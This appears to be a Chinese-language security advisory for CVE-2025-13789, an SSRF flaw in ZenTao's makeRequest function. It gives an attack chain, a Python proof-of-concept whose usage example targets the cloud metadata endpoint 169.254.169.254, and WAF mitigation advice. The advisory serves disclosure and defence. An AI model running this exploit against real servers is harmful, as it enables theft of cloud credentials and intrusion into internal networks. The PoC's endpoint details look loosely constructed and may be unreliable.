CVE-2025-13789 ZenTao项目管理系统makeRequest函数SSRF漏洞

漏洞信息

漏洞编号

CVE-2025-13789

漏洞类型

服务器端请求伪造(SSRF)

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

ZenTao

漏洞概述

CVE-2025-13789是ZenTao至胋项目管理软件中的一个服务器端请求伪造（SSRF）漏洞。该漏洞存在于ZenTao 21.7.6版本及之前的21.7.6-8564版本中，具体位于module/ai/model.php文件的makeRequest函数。攻击者可以通过操控makeRequest函数的Base参数，构造恶意请求，迫使服务器向攻击者指定的内部或外部资源发起请求。由于该漏洞可远程利用，且需要低权限认证，攻击者可以在不需要用户交互的情况下发起攻击。该漏洞的CVSS评分为6.3，属于中等严重程度，但已被公开利用，可能对未修复的系统造成严重威胁。攻击者可以利用此漏洞探测内网服务、读取本地文件、访问云元数据服务等敏感资源，从而进一步横向移动或获取敏感信息。

技术细节

漏洞位于ZenTao的module/ai/model.php文件中的makeRequest函数。该函数在处理用户输入的Base参数时，未对参数进行充分的验证和过滤，导致攻击者可以控制服务器发起请求的目标地址。攻击者可以通过构造恶意的Base参数值，使服务器向内部网络资源（如localhost、127.0.0.1、内网IP段）、云服务元数据端点（如AWS 169.254.169.254）或其他敏感服务发起请求。makeRequest函数可能被用于AI模型调用等场景，攻击者可以利用SSRF漏洞绕过防火墙限制，访问本不应该暴露的内部服务。此外，由于是服务器端发起的请求，攻击者还可以利用目标服务器的身份访问内部资源，绕过传统的网络边界防护。攻击者通常会结合其他漏洞或配置不当的云服务进行组合攻击，以获取更高的权限或更敏感的数据。

攻击链分析

STEP 1

步骤1

攻击者识别目标ZenTao系统，访问/module/ai/model.php端点

STEP 2

步骤2

攻击者构造恶意请求，将makeRequest函数的Base参数设置为内网地址或云元数据端点（如http://169.254.169.254）

STEP 3

步骤3

服务器接收到请求后，makeRequest函数会向攻击者指定的URL发起HTTP请求

STEP 4

步骤4

攻击者接收到来自目标服务器的响应，可以获取内网资源数据或云服务凭证

STEP 5

步骤5

攻击者利用获取的信息进行横向移动或进一步权限提升攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

def exploit_srf(target_url, attacker_controlled_url):
    """
    PoC for CVE-2025-13789 - ZenTao SSRF via makeRequest function
    
    Args:
        target_url: Base URL of vulnerable ZenTao instance
        attacker_controlled_url: URL controlled by attacker for SSRF
    """
    # Vulnerable endpoint and parameter
    endpoint = "/module/ai/model.php"
    params = {
        "Base": attacker_controlled_url,  # SSRF payload
        "method": "makeRequest"
    }
    
    try:
        response = requests.get(target_url + endpoint, params=params, timeout=10)
        print(f"[*] Request sent to: {target_url}{endpoint}")
        print(f"[*] Target URL parameter: {attacker_controlled_url}")
        print(f"[*] Response status: {response.status_code}")
        print(f"[*] Response length: {len(response.text)}")
        return response
    except requests.exceptions.RequestException as e:
        print(f"[!] Error: {e}")
        return None

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"Usage: python {sys.argv[0]} <target_url> <attacker_url>")
        print(f"Example: python {sys.argv[0]} http://vulnerable-zen tao.com http://169.254.169.254/latest/meta-data/")
        sys.exit(1)
    
    target = sys.argv[1]
    attacker_url = sys.argv[2]
    exploit_srf(target, attacker_url)

影响范围

ZenTao <= 21.7.6

ZenTao <= 21.7.6-8564

防御指南

临时缓解措施

在官方补丁发布前，建议临时限制对/module/ai/model.php端点的访问，或者通过Web服务器配置阻止对内网地址的请求。可以在Web应用防火墙中配置规则，检测并阻止包含内网IP段（10.0.0.0/8、172.16.0.0/12、192.168.0.0/16）、localhost（127.0.0.1）以及云元数据端点（169.254.169.254）的请求。同时，建议监控服务器的外向流量，及时发现异常的SSRF攻击行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13789
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13789
3 Details https://www.cvedetails.com/cve/CVE-2025-13789/
4 VulDB https://vuldb.com/cve/CVE-2025-13789
5 Link https://github.com/ez-lbz/ez-lbz.github.io/issues/2
6 Link https://github.com/ez-lbz/ez-lbz.github.io/issues/2#issue-3598317459
7 Link https://github.com/ez-lbz/ez-lbz.github.io/issues/2#issuecomment-3540247346
8 Link https://vuldb.com/?ctiid.333793
9 Link https://vuldb.com/?id.333793
10 Link https://vuldb.com/?submit.690728
11 Link https://www.zentao.net/extension-viewext-6.html